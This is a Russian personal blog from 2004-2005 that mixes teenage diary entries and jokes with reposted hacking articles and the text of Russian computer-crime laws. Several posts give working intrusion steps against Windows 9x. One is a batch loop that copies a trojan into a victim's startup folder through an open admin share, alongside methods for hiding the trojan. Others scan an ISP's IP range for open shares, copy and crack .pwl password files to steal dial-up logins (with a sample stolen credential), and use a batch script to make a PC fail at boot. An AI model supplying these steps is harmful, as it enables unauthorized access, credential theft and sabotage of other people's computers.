-Поиск по дневнику

Поиск сообщений в Corik

 -Подписка по e-mail

 

 -Интересы

 -Постоянные читатели

 -Статистика

Статистика LiveInternet.ru: показано количество хитов и посетителей
Создан: 26.11.2004
Записей:
Комментариев:
Написано: 47





ПОМАГИТЕ!!!!!

Пятница, 04 Марта 2005 г. 01:00 + в цитатник
Вы прикинте, я изменил своей девушке с ее ЛУЧШЕЙ ПОДРУГОЙ. Как так можна??? Мы теперь с ней расстались, и не знаю как мне ее вернуть... Может мне ктонить поможет??? ПОЖАЛУЙСТА!!!!


Понравилось: 8 пользователям

Фича.

Вторник, 15 Февраля 2005 г. 00:14 + в цитатник
Седня се поставил прогу, Skype Эт инет телефон=))) Тока в нет залез звонок, ну я отвечаю, а мне прямо в наушники орут чето непонятное на заморском Англиском=))) Я им как мог, объяснил что по ихнему нефига... Вроде поняли. Гы... Пришлось применять все знания ихнего языка в том числе такие словечки как Fuck, Bitch и все в ентом духе.

Сука - скука.

Четверг, 10 Февраля 2005 г. 01:07 + в цитатник
Делать вообще нефига, скушно до посинения... Ё, блина, пойду в чат, мож че интересного бует....

ЖОПА!!!

Среда, 02 Февраля 2005 г. 23:28 + в цитатник
Седня опятьки в тренажорку ходил... Эт ваще ЖОПА полная. Так я потом ышо и гулять сразу поперся. Ща вот еле на клавиши пальцами жмякаю. Ваще труба...

Rulezzzzz

Понедельник, 31 Января 2005 г. 23:35 + в цитатник
Седня стыбрил всетаки у мальца MP3 Fear Factory!!! Ура! Во енто ваще руль!!!! Давненько я такой колбасы не слыхивл.

А енто шоб знали...

Пятница, 28 Января 2005 г. 15:33 + в цитатник
Вот и уголовный кодекс. Шоб знали че бывает за взломы и т.д.
Статья 272. Неправомерный доступ к компьютерной информации.


Неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на машинном носителе, в электронно-вычислительной машине (ЭВМ), системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети, - наказывается штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев, либо исправительными работами на срок от шести месяцев до одного года, либо лишением свободы на срок до двух лет.
То же деяние, совершенное группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно имеющим доступ к ЭВМ, системе ЭВМ или их сети, - наказывается штрафом в размере от пятисот до восьмисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от пяти до восьми месяцев, либо исправительными работами на срок от одного года до двух лет, либо арестом на срок от трех до шести месяцев, либо лишением свободы на срок до пяти лет.

\Комментарий к статье 272\
1. Объектом данного преступления является безопасность пользования интеллектуальными и вещественными средствами вычислительной техники.
2. Объективную сторону данного преступления составляют создание, использование и распространение вредоносных программ для ЭВМ, а равно внесение вредоносных изменений в существующие программы.
3. Программа для ЭВМ - это объективная форма представления совокупности данных и команд, предназначенных для функционирования ЭВМ с целью получения определенного результата (ст. 1 Закона РФ "О правовой охране программ для электронных вычислительных машин и баз данных"). Программа реализует алгоритм решения какой-либо задачи.
4. Создание программы для ЭВМ - это написание ее алгоритма, т.е. последовательности логических команд, с дальнейшим преобразованием его в машинный язык ЭВМ. Внесение изменений в существующую программу означает изменение ее алгоритма путем исключения его фрагментов, замены их другими, дополнения его. Внесение изменений в существующую программу может быть элементом объективной стороны данного преступления лишь в том случае, если виновный исправил работающую в ЭВМ программу либо распространил исправленную программу на любом носителе.
5. Ответственность по данной норме уголовного закона должна наступать и в том случае, если изменения в существующую программу вносятся лицом не непосредственно, а посредством специальной программы для ЭВМ, разработанной для внесения соответствующих изменений.
6. Вредоносность или полезность соответствующих программ для ЭВМ определяется не в зависимости от их назначения, способности уничтожать, блокировать, модифицировать, копировать информацию (это - вполне типичные функции абсолютно легальных программ), а в связи с тем, предполагает ли их действие, во-первых, предварительное уведомление собственника компьютерной информации или другого добросовестного пользователя о характере действия программы, а во-вторых, получение его согласия (санкции) на реализацию программой своего назначения. Нарушение одного из этих требований делает программу для ЭВМ вредоносной.
7. Вредоносность так называемых "компьютерных вирусов" связана с их свойством самовоспроизводиться и создавать помехи в работе на ЭВМ без ведома и санкции добросовестных пользователей. Вирусные программы обычно включают команды, обеспечивающие самокопирование и маскировку.
8. Программа считается приводящей к указанным в данной норме уголовного закона неблагоприятным последствиям, если именно ее функционирование вызывает уничтожение, блокирование, модификацию, копирование компьютерной информации.
9. Использование программы для ЭВМ - это выпуск ее в свет, воспроизведение и иные действия по введению ее в хозяйственный оборот в изначальной или модифицированной форме, а также самостоятельное применение этой программы по назначению. Под использованием машинного носителя с такой программой понимается всякое его употребление с целью использования записанной на нем программы для ЭВМ. Использование вредоносной программы для ЭВМ для личных нужд (например, для уничтожения собственной компьютерной информации) не наказуемо.
10. Распространение программы для ЭВМ - это предоставление доступа к воспроизведенной в любой материальной форме программе для ЭВМ, в том числе сетевыми и иными способами, а также путем продажи, проката, сдачи внаем, предоставления взаймы, а также создание условий для самораспространения программы. Под распространением машинного носителя с программой для ЭВМ понимается его передача на каких бы то ни было условиях третьим лицам.
11. Под тяжкими последствиями создания, использования или распространения вредоносных программ для ЭВМ понимаются безвозвратная утрата особо ценной информации, выход из строя важных технических средств (например, систем оборонного назначения, аэронавигационной техники), повлекший несчастные случаи с людьми, аварии, катастрофы.
12. В случае, если действие вредоносной программы было условием совершения лицом другого преступления, деяния должны быть квалифицированы по совокупности вне зависимости от степени тяжести другого преступления.
13. Создание, использование и распространение вредоносных программ для ЭВМ - это преступление, совершаемое только с прямым умыслом. Лицо понимает, что программа в имеющемся виде вредоносна, заведомо знает, что она способна вызвать указанные неблагоприятные последствия. Лицо, создавшее, использовавшее вредоносную программу, распространившее ее через третьих лиц, отвечает за возникшие тяжкие последствия, если оно предвидело возможность наступления этих последствий. Преступная небрежность в данном случае не вменяется в вину, если между созданием, использованием и распространением вредоносной программы и соответствующими тяжкими последствиями так много промежуточных звеньев, что субъект явно не может предвидеть столь опасный результат.
14. Уголовной ответственности за совершение данного преступления подлежит только вменяемое физическое лицо, достигшее ко времени совершения преступления 16-летнего возраста. Закон не требует, чтобы это лицо занимало определенную должность, занималось определенной деятельностью, получило определенное образование.

Вверх

Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ.


Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами - наказываются лишением свободы на срок до трех лет со штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев.
Те же деяния, повлекшие по неосторожности тяжкие последствия, - наказываются лишением свободы на срок от трех до семи лет.

\Комментарий к статье 273\
1. Объектом данного преступления является безопасность пользования интеллектуальными и вещественными средствами вычислительной техники.
2. Объективную сторону данного преступления составляют создание, использование и распространение вредоносных программ для ЭВМ, а равно внесение вредоносных изменений в существующие программы.
3. Программа для ЭВМ - это объективная форма представления совокупности данных и команд, предназначенных для функционирования ЭВМ с целью получения определенного результата (ст. 1 Закона РФ "О правовой охране программ для электронных вычислительных машин и баз данных"). Программа реализует алгоритм решения какой-либо задачи.
4. Создание программы для ЭВМ - это написание ее алгоритма, т.е. последовательности логических команд, с дальнейшим преобразованием его в машинный язык ЭВМ. Внесение изменений в существующую программу означает изменение ее алгоритма путем исключения его фрагментов, замены их другими, дополнения его. Внесение изменений в существующую программу может быть элементом объективной стороны данного преступления лишь в том случае, если виновный исправил работающую в ЭВМ программу либо распространил исправленную программу на любом носителе.
5. Ответственность по данной норме уголовного закона должна наступать и в том случае, если изменения в существующую программу вносятся лицом не непосредственно, а посредством специальной программы для ЭВМ, разработанной для внесения соответствующих изменений.
6. Под несанкционированным уничтожением, блокированием, модификацией, копированием информации понимаются не разрешенные законом, собственником информации или другим компетентным пользователем указанные действия.
О понятиях ЭВМ, системы ЭВМ, сети ЭВМ; лица, имеющего доступ к ЭВМ, системе ЭВМ или их сети; уничтожения, блокирования или модификации компьютерной информации см. комментарий к ст. 272 УК.
7. Вредоносность или полезность соответствующих программ для ЭВМ определяется не в зависимости от их назначения, способности уничтожать, блокировать, модифицировать, копировать информацию (это - вполне типичные функции абсолютно легальных программ), а в связи с тем, предполагает ли их действие, во-первых, предварительное уведомление собственника компьютерной информации или другого добросовестного пользователя о характере действия программы, а во-вторых, получение его согласия (санкции) на реализацию программой своего назначения. Нарушение одного из этих требований делает программу для ЭВМ вредоносной.
8. Вредоносность так называемых "компьютерных вирусов" связана с их свойством самовоспроизводиться и создавать помехи в работе на ЭВМ без ведома и санкции добросовестных пользователей. Вирусные программы обычно включают команды, обеспечивающие самокопирование и маскировку.
9. Программа считается приводящей к указанным в данной норме уголовного закона неблагоприятным последствиям, если именно ее функционирование вызывает уничтожение, блокирование, модификацию, копирование компьютерной информации.
10. Использование программы для ЭВМ - это выпуск ее в свет, воспроизведение и иные действия по введению ее в хозяйственный оборот в изначальной или модифицированной форме, а также самостоятельное применение этой программы по назначению. Под использованием машинного носителя с такой программой понимается всякое его употребление с целью использования записанной на нем программы для ЭВМ. Использование вредоносной программы для ЭВМ для личных нужд (например, для уничтожения собственной компьютерной информации) не наказуемо.
11. Распространение программы для ЭВМ - это предоставление доступа к воспроизведенной в любой материальной форме программе для ЭВМ, в том числе сетевыми и иными способами, а также путем продажи, проката, сдачи внаем, предоставления взаймы, а также создание условий для самораспространения программы. Под распространением машинного носителя с программой для ЭВМ понимается его передача на каких бы то ни было условиях третьим лицам.
12. Под тяжкими последствиями создания, использования или распространения вредоносных программ для ЭВМ понимаются безвозвратная утрата особо ценной информации, выход из строя важных технических средств (например, систем оборонного назначения, аэронавигационной техники), повлекший несчастные случаи с людьми, аварии, катастрофы.
13. В случае, если действие вредоносной программы было условием совершения лицом другого преступления, деяния должны быть квалифицированы по совокупности вне зависимости от степени тяжести другого преступления.
14. Создание, использование и распространение вредоносных программ для ЭВМ - это преступление, совершаемое только с прямым умыслом. Лицо понимает, что программа в имеющемся виде вредоносна, заведомо знает, что она способна вызвать указанные неблагоприятные последствия. Лицо, создавшее, использовавшее вредоносную программу, распространившее ее через третьих лиц, отвечает за возникшие тяжкие последствия, если оно предвидело возможность наступления этих последствий. Преступная небрежность в данном случае не вменяется в вину, если между созданием, использованием и распространением вредоносной программы и соответствующими тяжкими последствиями так много промежуточных звеньев, что субъект явно не может предвидеть столь опасный результат.
15. Уголовной ответственности за совершение данного преступления подлежит только вменяемое физическое лицо, достигшее ко времени совершения преступления 16-летнего возраста. Закон не требует, чтобы это лицо занимало определенную должность, занималось определенной деятельностью, получило определенное образование.

Статья 274. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети.


Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети лицом, имеющим доступ к ЭВМ, системе ЭВМ или их сети, повлекшее уничтожение, блокирование или модификацию охраняемой законом информации ЭВМ, если это деяние причинило существенный вред, - наказывается лишением права занимать определенные должности или заниматься определенной деятельностью на срок до пяти лет, либо обязательными работами на срок от ста восьмидесяти до двухсот сорока часов, либо ограничением свободы на срок до двух лет.
То же деяние, повлекшее по неосторожности тяжкие последствия, - наказывается лишением свободы на срок до четырех лет.

\Комментарий к статье 274\
1. Объектом данного преступления является безопасность пользования интеллектуальными и вещественными средствами вычислительной техники.
2. Правила эксплуатации ЭВМ определяются соответствующими техническими нормативными актами. Они также излагаются в паспортах качества, технических описаниях и инструкциях по эксплуатации, передаваемых пользователю при приобретении вещественных средств компьютерной техники (ЭВМ и периферийных устройств), в инструкциях по использованию программ для ЭВМ. Соответствующие инструкции могут излагаться на бумажных и машинных носителях; в последнем случае они включаются в программу, которая обеспечивает к ним доступ при желании пользователя. Таким образом, нарушения правил эксплуатации ЭВМ могут быть подразделены на физические (неправильная установка приборов, нарушение температурного режима в помещении, неправильное подключение ЭВМ к источникам питания, нерегулярное техническое обслуживание, использование не сертифицированных средств защиты и самодельных приборов и узлов) и интеллектуальные (неверное ведение диалога с компьютерной программой, ввод данных, обработка которых непосильна данным средствам вычислительной техники).
О понятиях ЭВМ, системы ЭВМ, сети ЭВМ; лица, имеющего доступ к ЭВМ, системе ЭВМ или их сети; уничтожения, блокирования или модификации компьютерной информации см. комментарий к ст. 272 УК.
3. Под существенным вредом в диспозиции данной нормы уголовного закона понимается утрата важной информации, перебои в производственной деятельности, необходимость сложного или длительного ремонта средств вычислительной техники, их переналадки, длительный разрыв связей между ЭВМ, объединенными в систему или сеть. Существенность вреда определяется с учетом имущественного положения и организационных возможностей собственника или владельца ЭВМ.
4. Под тяжкими последствиями нарушения правил эксплуатации ЭВМ понимаются безвозвратная утрата особо ценной информации, выход из строя важных технических средств (например, систем оборонного назначения, аэронавигационной техники), повлекший несчастные случаи с людьми, аварии, катастрофы.
5. В случае, если нарушение правил эксплуатации ЭВМ повлекло также и совершение лицом другого преступления, деяния должны быть квалифицированы по совокупности, если другое преступление наказывается более строго. Если другое преступление наказывается более мягко, то следует считать, что наступившие неблагоприятные последствия уже подразумеваются данной нормой уголовного закона.
6. Нарушение правил эксплуатации ЭВМ может совершаться как с умыслом, так и по неосторожности.
7. Субъектом данного преступления может быть только вменяемое физическое лицо, достигшее 16-летнего возраста. Закон не требует, чтобы это лицо занимало определенную должность, осуществляло определенную деятельность, получило определенное образование.

Уголовный Кодекс Российской Федерации.




Очень прикольно!

Новая статейка. Ура товарищи!!!

Понедельник, 24 Января 2005 г. 01:44 + в цитатник
Надыбал я ее на своем любимом винте... Прошу любить и жаловать. ОЧЕНЬ ЖДУ КОММЕНТОВ!
Статья не дает конкретных рекомендаций и данных, дабы не каждый мог воспользоваться описанными вещщами.

Цель статьи показать на что можно извратиться в обычных форточках, ведь многие даже и не предполагают о подобных методах извращщения, хотя все довольно просто и обычно. Применение же подобных вещщей очень сильно увеличивает обнаружение и удаление трояноподобия из системы.

Начнем обзор с небольшого экускурса по программке GlassControl 3.1, ее способ самоустановки довольно необычен, за что он и получил свою популярность.

Как все происходит ?

GC3 прописывает себя в реестре на автозапуск из сети, даже если виря нет в системе, то он будет само устанавливаться именно из за ссылки в реестре.
И вторая - главная фишка в подмене одного системного файла, который грузиться по умолчанию. Происходит даже не его подмена, а подмена ссылки на него при запуске системы, после чего GC3 сам его загружает.

Этот медод как оказалось - очень эффективен.

Создание скрытого диска - оказалась большой дырой при удаленном обнаружении пораженных компьютеров в сети. Создаетсяя диск Z$ с полным доступом. Как известно в сети можно найти все скрытые шары, но для этого надо пользоваться собственным ПО, система не позволит узнать это, только если не тыкать пальцем в небо.

Как создать скрытый диск так чтобы он не сканировался любым ПО ?

Выходов немного.
1) Один из них - создание динамическо-открываемого диска,2) второй - создание скрытого системного ресурса.

1-Диск открывается на один сеанс работы по сигналу, опять же программа дожна распознать такой сигнал, и откыть доступ на один сеанс. Во время этого сеанса иск могут увидеть, но в остальное время - нет(большинство времени) Это создает некоторые проблеммы, нужно время - и это самое важное.

2-Создается шара под именем printer$ или другая. Известно что эта шара обычно отдает в доступ путь %windir%\system , поэтому шансы на то что ее будут проверять именно на этот путь - малы, НО они есть 8(

можно обьединить оба способа и прибавить к нему установка пароля на доступ к ресурсу, получиться вполне Steath 8)

Чертова рука при отдавании ресурса в доступ на иконке ресурса..

Что делать если народ научился опознавать что их диск отдан в сеть ? Если они это определяют по синей дурацкой руке, то проблемма решается просто, Мелкософт предусматрела такую возможность, когда создается шара, в ее флагах прописывается что-то типа 192 - на R/W или 191 на ReadOnly , однако если у вас выдан в сеть принтак или стоит удаленка, то папка с виндой не держиться ручищщей .. и флаг поэтому у них другой : 302 на запись и 301 на чтение. Младшие 2 бита отвечают за тип доступа, а пятый(или 11 8-\) за видимость значка.Вот и все, просто когда выдаешь ресурс, то флаг должен быть типа 302.
Ну а если народ прочухивает дело по реестру, то тут уж помоч могут только трояны, ключ CURRENT_USER не выдаст шару, если в ней прописать ее, опробовано!
Но есть еще один способ.. он довольно прямой и наглый, но сработает.. нужно просто стереть программу REGEDIT, либо на время ее запуска подсовывать заранее скопированный реестр.

К вопросу о $

Как-то я ковырял систему, уж очень мне нравиться искать в ней скрытости и вшитости. Заинтересовал меня ADMIN$ и обнаружил нехилую дыру..

Нехилая $ дыра

Что позволяет дыра ?

Дыра позволяет кому угодно получить полный доступ ко всем жестким дискам жертвы,когда системой управляет кто-либо из сети.

Какие же это чертовы условия ?

Стоит галка - удаленное управление
на данном сеансе кто-либо использовал Удаленку
Расскажи как мне захачить кого-нибудь?

Для этого у него дожны быть соблюдены вышеуказанные условия. Если все так, то просто набирай в окне "ВЫПОЛНИТЬ": \\computer\c$
вот тебе и его полный диск, можешь попробовать \\computer\d$ и так далее. Если на машине несколько жестких дисков, то все они будут доступны в текущщем сеансе работы жертвы.

или можно написать ХАК на BAT языке..

сначала ищешь комп, проверяешь его на наличие ADMIN$, пытаешь подобрать пароль - неполучается, тогда запускаешь HACK.BAT
-----------------------------

:again
copy TROJAN.EXE "\\VICTIM\C$\Windows\Главное меню\Программы\Автозагрузка\"
goto again

-----------------cut here----
Запускаешь такую мысль и просто напросто ждешь.. может уйти много времени, можешь спровоцировать если знаешь кого ввести пароль для управления. Если сработает, то после перезагрузки жертвы запуститься ваша программа TROJAN.EXE, чего и требовалось сделать.

Почему так происходит ?

Система очень простая: Когда кто-либо берет удаленное управление, то после набора пароля, якобы ЕМУ становиться доступен весь диск жертвы, ведь он набрал пароль!, но MicroSoft не предусмотрела аудентификацию, поэтому машина жертвы не может понять кто к ней ломиться на винт и пускает всех. При этом возникает оочень интересный эффект: В реестре этих ШАР нету, но они открыты под именами дисков плюс знак "$"

Как система устанавливает Удаленное Управление ?

Тут система полностью деревянная даже в 98SE. Были созданы снимки системы до и после установки, В реестре добавляется 6 ключей у ADMIN$. В принципе это ничто иное как скрытая шара, единственная фишка в названии. Удаленные системы опираются именно на название, если оное обнаружено, то удаленка - ЕСТЬ! 8(
Таким образом ничего хорошего это не значит.А если вы вручную создали ADMIN$, то установка через панель просто изменит параметры.

ПсевдоRealTime Trojan

Эта тема - решает проблемму обнаружения тряна в системе. Реально в памяти нихрена не загружено, поэтому смотреть список текщих задач и драйверов - безполезно. При всем этом наша прога будет максимально приближена к обычному болтанию в памяти.

Каким образом прога узнает обращение к ней, если она даже не запущена ?

Вся фичка в установке некоторых параметров в реестре. Итак выходом из ситуации будет частый запуск нашей проги. Для этого устанавливаем перенаправление какого-либо события на запуск нашей проги. Один из вариантов - изменение действия значков на рабочем столе. Другой,попрощще способ - подмена программ типа WinAmp, которые частенько запускаются.
ВОт и получается что мы не болтаемся в системе, но довольно часто получаем управление.

Хинт не в тему: Иногда может пригодиться такая фича: Режим сортировки "UNSORTED" или "Не Сортировать" 8) показывает файлы в том порядке в котором они были записаны. т.е. самый последний - в самом конце.


Cтатья про...

Суббота, 22 Января 2005 г. 05:02 + в цитатник
Прет!!! Как и обещал выкладываю статейку как сделать се халявный Инет. Прошу:
Для начала, надо качнуть се какуюнить сканилку... типа ENT=))) Я расскажу как юзать NBS.
Енту прогу можна скачать на www.xtool.org. В архиве будет два EXE' шника. Вначале запустим NSS сканер.
Вводим Ip провайдера услугами которого ты будеш пользоваться и кнопаем "сканировать". После этих нехитрых действий,
должно появиться туеву хучу
ипешников всяких юзверей. Но нам не подойдет любой комп. В поле "Имя-статус" смотрим значек сетевого диска.
Короче, не похожий на другие=))) И незамедлительно кликаем на него левой кнопой Мауса. Появится другое окно. Енто и будет
второй exe' шник. После всего ентого кнопаем на "подключиться" и ждем. Ооооо, вот и появились его В смысле юзверя=))),
диски. Нажимаем на "подобрать" и чуток ждем. Если все Ок, то напротив ентого диска появится надпись
"Без пароля". Кликаем на диск, и подключаем его как сетевой диск. Потом открываем командную строку и пишем имя ентого диска. Нампример E: После того как ты залез на его винт, пиши E:\>dir win* Как тока ты нашел его винду, заходь
в енту папку, там пиши E:\windows>dir *.pwl после чего должно появиться типа
Том в устройстве Е не имеет метки
Серийный номер тома: 2247-15D0
Содержимое каталога D:\WIN95
lamer PWL 730 02-05-99 10:31p lamer.PWL
1 файл(а,ов) 730 байт
0 каталог(а,ов) 287,997,952 байт свободно
Пишиш E:\windows>copy lamer.pwl c:\hack
На ентом, первый этап закончен.
Терь можна отрубать его диск. и доставать порогу pwlhack.
Для начала надо скопировать стыбжиную PWl'ку в папку с прогой pwlhack.
Потом врубаем ее тоже под ДОС и пишем
C:\hack\PWLHACK>pwlhack.exe /list lamer.pwl lamer
Должно появиться
C) 21-May-1999y by Hard Wisdom "PWL's Hacker" v4.10 (1996,97,98,99)
Enter the password:
File 'lamer.PWL' has size 730 bytes, version [W95osr2_Win98]
for user 'lamer' with password '' contains:
-[Type]-[The resource location string]--------------[Password]-
Dial X *Rna\Соединение с lamerishe\KS015174 fsa3Xfa12
---------------------------------------------------------------
Indexed Entryes: 1; Number of resources: 1.
Короче
Login :KS015174
Password:fsa3Xfa12
Ну вот и все. Удачного вам хака. Кому надо эти и многие другие проги, пишите мне на Corr@xaker.ru, вышлю.
(R)Corr2005!


Ышо одна лажа... Западло.

Суббота, 22 Января 2005 г. 01:41 + в цитатник
Во ента херь может кому и поможет... чтайте:
1. Создаем батник (antilammo.bat) на d-диске, в нем пишем: @echo off {что б не показывало содержимое при загрузки} copy c:\windows\system.ini d:\ {а это для того, чтобы потом можно было пофиксить тачку} DEL c:\windows\system.ini {no comments} del d:\antilammo.bat {и чтобы никаких следов}
2. А теперь клепаем другой батник (savelammo.bat), в котором пишем: @echo off copy d:\system.ini c:\windows {со следующей перезагрузки все ОК} del d:\savelammo.bat
3. Прописываешь просто в autoexec.bat вот это: d:\antilammo.bat DEL c:\autoexec.bat {по желанию и настроению} И в результате комп вешается только после перезагрузки. С задержкой, зато безнаказанно :). А вот как пофиксить тачку? Помнишь про savelammo.bat? Значит делаешь так. Загружаешь комп и на 125-ой секунде :) жмешь F8, а когда появляется менюшка, выбираешь пункт загрузки в DOS. В результате оказываешься в DOS и просто грузишь заранее состряпанный SAVELAMMO.BAT. Гениальное все просто :).

P.S. Завтро али послезавтро, кину статью как тырить PWL файло, как и чем его расшифроватьки.

Просто так...

Четверг, 20 Января 2005 г. 01:07 + в цитатник
Вот у ся нарыл почитайте, прикольно.
1.
Хоpошо: Твоя жена беpеменна.
Плохо: В yтpобе целых тpи pебёнка.
Очень плохо: Ты сделал опеpацию по пеpевязке семенных канатиков
тpи года назад.
2.
Хоpошо: Твоя жена с тобой не pазговаpивает.
Плохо: Она хочет pазвода.
Очень плохо: Она адвокат.
3.
Хоpошо: Твой сын взpослеет.
Плохо: Завёл pоман с пожилой соседкой.
Очень плохо: Ты тоже.
4.
Хоpошо: Твой сын пpоводит много вpемени в своей комнате.
Плохо: У него в комнате ты находишь спpятанные поpнофильмы.
Очень плохо: Ты в некотоpых из них.
5.
Хоpошо: Твой мyж наконец-то согласен - хватит детей!
Плохо: Hе можешь найти пpотивозачаточные таблетки.
Очень плохо: Их взяла твоя дочь.
6.
Хоpошо: Твой мyж pазбиpается в моде.
Плохо: Ты обнаpyживаешь, что тайком он надевает твои вещи.
Очень плохо: Емy они идyт больше, чем тебе.
7.
Хоpошо: Ты пpоводишь беседy о тычинке и пестике со своей дочкой.
Плохо: Она постоянно тебя пеpебивает...
Очень плохо: ...и попpавляет.
8.
Хоpошо: У твоего сына пеpвое свидание.
Плохо: С мyжчиной.
Очень плохо: Котоpый твой лyчший дpyг.
9.
Хоpошо: Твоя дочь нашла pаботy сpазy после инститyта.
Плохо: в качестве пpоститyтки.
Очень плохо: Hекотоpые из твоих коллег - её клиенты.
Слишком плохо: Она заpабатывает больше, чем ты.
10.
Хоpошо: Читая всё вышепеpечисленное, ты смеялся.
Плохо: Ты знаешь людей с похожими ситyациями.
Очень плохо: Один из них - ты.

Не очем...

Вторник, 11 Января 2005 г. 01:02 + в цитатник
Драсте всем! Хотя один хер этот дневник нихто не читает... =))) Ну, дело не в этом. Короче всех с Новым 2005 Годом всем всего и побольше!!!
Юлик, прости что не пишу потом все расскажу... У меня ща проблем до }{... Много. Еще раз прости.

О вреде геймилок...

Пятница, 17 Декабря 2004 г. 00:23 + в цитатник
Я седня в сотый раз перечитывал журнал }{акер и наткнулся на статейку. Прикольнула она меня, вот решил поделиться.
На этот раз мы поговорим о влиянии компьютерных игр на мозг человека. Мои последние исследования показали, что даже невинные на первый взгляд игрушки подвергают необратимой деформации сознание среднестатистического геймера. Кстати, в ходе моих очередных бесчеловечных экспериментов на людях, мышах и джойстиках были выявлены довольно интересные закономерности. Например, как вы думаете, какая игра оказывает наиболее деструктивное влияние на поведенческие инстинкты человека, превращая его в неумолимую боевую машину? Квейк? Друзья мои, Квейк по сравнению с этой игрой - просто апогей гуманизма, проповедующий любовь к ближнему, а также вселенское милосердие и сострадание к инопланетным культурам. Carmageddon? Ни в коей мере! Если этот миролюбивый симулятор и породил двух-трех маньяков-убийц одиноких старушек, то теперь они надежно заперты в редакции Х и занимаются своим темным (что еще, кстати, довольно спорно) делом в крохи свободного от работы времени.

Да, друзья мои, замочите из шотг... брррр... то есть плюньте в лицо продажным журналисткам, которые со слезами на глазах заявляют, что "Два техасских подростка, наигравшись в Квейк, съели свою пятилетнюю сестру, а затем зверски убили и изнасиловали бабушку", ибо они не видят сути проблемы. Но не буду вас больше томить и сразу предъявлю ошеломляющие результаты исследований. Итак, самым страшным психологическим оружием, которое наиболее жутким образом изменяет сознание человека, являются ролевые игры. Самой деструктивной игрой учеными всего мира во главе со мной признан сиквел Fallout. И не надо тут снисходительно улыбаться, произнося: "Ну и что же там такого зверского?". А ну-ка вспомни, дорогой друг, что ты делал пятнадцать минут назад? Да, да, ты. Вспомнил? Правильно, пятнадцать минут назад ты убил десятилетнего мальчика, чтобы, покопавшись в его останках, извлечь горстку монет, так необходимых тебе на новый гранатомет. А что ты сказал патрулю, который расстреливал безоружных ученых? И не надо водить ножкой по полу, я хорошо помню эти слова: "О, господин, я никогда никому не скажу, что вы только что замочили здесь безоружных невинных людей". А какие навыки наиболее развиты у твоего героя? Добродушие, первая помощь и ораторское искусство? Чего глазки-то забегали? Да за версту видно, что у тебя на максимуме воровство, взлом и шпионаж.

Я даже составил небольшой список тех принципов, которыми начинает руководствоваться любой человек, поигравший в Fallout (2) больше часа:

1. Если у кого-то есть оружие - его надо убить и забрать это оружие.

2. Если у кого-то нет оружия, но есть деньги - его надо убить и забрать деньги.

3. Если у кого-то нет ни оружия, ни денег - его надо убить, чтобы накопить опыт убийств.

4. Если кого-то можно убить, его нужно убить!

5. Если кого-то нельзя убить, надо пойти убить того, кого можно, забрать его оружие и убить того, кого нельзя.

Я бы мог продолжать этот список до бесконечности, причем в каждом из его пунктов слово "убить" встречалось бы не менее двух раз, но для наглядности приведу лучше статистику жизнедеятельности людей, на которых я испытывал Fallout (2). Всего в эксперименте участвовало 28 человек, включая меня.
6 человек уволены с работы (я тоже).

9 отчислены из института за непосещаемость (я тоже).

11 при попытке отобрать у них диск с игрой совершили преступления различной степени тяжести, от зверского избиения хозяина диска до попытки преднамеренного убийства (я - хозяин диска).

7 потеряли своих девушек, ответив на предложение погулять незамысловатыми матерными выражениями, чередующимися со словами "армор, плазма, мутант и пауэ райфл" (я тоже).

1 простоял целый день в коридоре, на все вопросы отвечая, что ему не хватает очков действия для того чтобы дойти до двери (и не надо так на меня смотреть).

4 находятся сейчас в лечебнице для душевнобольных, куда их доставили охранники одного из магазинов 24 часа. Эти индивидуумы представились как сотрудники психоделической разведки, отделения братства стали и потребовали от продавщицы "джэт и атомный поглотитель ".



Драсте всем!!! Я седня узнал что ентот дэй

Понедельник, 13 Декабря 2004 г. 01:29 + в цитатник
Драсте всем!!! Я седня узнал что ентот дэй конситуции последний вообще... Больше его никода небудет... Обидно! Лан пойду я... Пока всем!

Еще одна статейка...

Пятница, 10 Декабря 2004 г. 02:19 + в цитатник
А вот и я!!! Давненько меня здесь небыло... Ловите новую статейку по Хаку. Надеюсь пригодится...
Чтобы не стать жертвой чужих экспериментов со сканерами, посмотрим, как новички добывают халявный инет:
Этап 1.

ДЛЯ начала надо скачать прогу PWLhack ,собственно это переборщик для PWL файлов для винды9Х , или PWLTool (RePWL) вот с ней и будем работать . Далее стоит выбрать подходяший сканер , в нашем случае возьмем Essential Net Tools .и фар манаджер думаю обьяснять, что ето не надо :).

Этап 2.

НЕ будем ждать сразу все применем на практике .Запустите программу Essential Net Tools . В левой колонке, нажимаете на NBScan В нижнем окошке, где написано Starting IP address:, введите начальный IP. В нашем случае это 212.38.112.1 Автоматически заполнится нижнее окошко - Ending IP address. И нажимаете на кнопку Start.

Программа начнёт сканировать все подключённые к этому диапазону в данное время компьютеры. После окончания сканирования смотрите на результаты. В колонке RS есть надписи YES и NO. Сразу же уберите взгляды с NO . И можете больше не обращать на них внимания. Нам нужны только YES. Но и это ещё не всё.

В самой последней колонке, где написано MAC Address , видно много цифр.Опять же, уберите взгляды с чисел, начинающимися на 00: Это системы Windows 2000, Unux и другие. С них вы всё равно ничего не получите. Нам нужны OS - Windows 95, 98, Me.

Цифры типа 44:45:53:54:... это и есть нужные нам ситемы . В них то мы и будем искать расшаренныЙ диск С. Выбрав первую жертву, например

Lamos microsoft YES
213.45.67.2 44:45:53:54:00:00

тыкаете на него правой кнопкой мышки и нажимаете Open Computer Система при этом может на 2-3 минуты затормозить, винт затрещит, начнёт думать. Не волнуйтесь, это нормально. Откроется панель Explorer (точно такая же, как когда вы открываете "Мой компьютер")

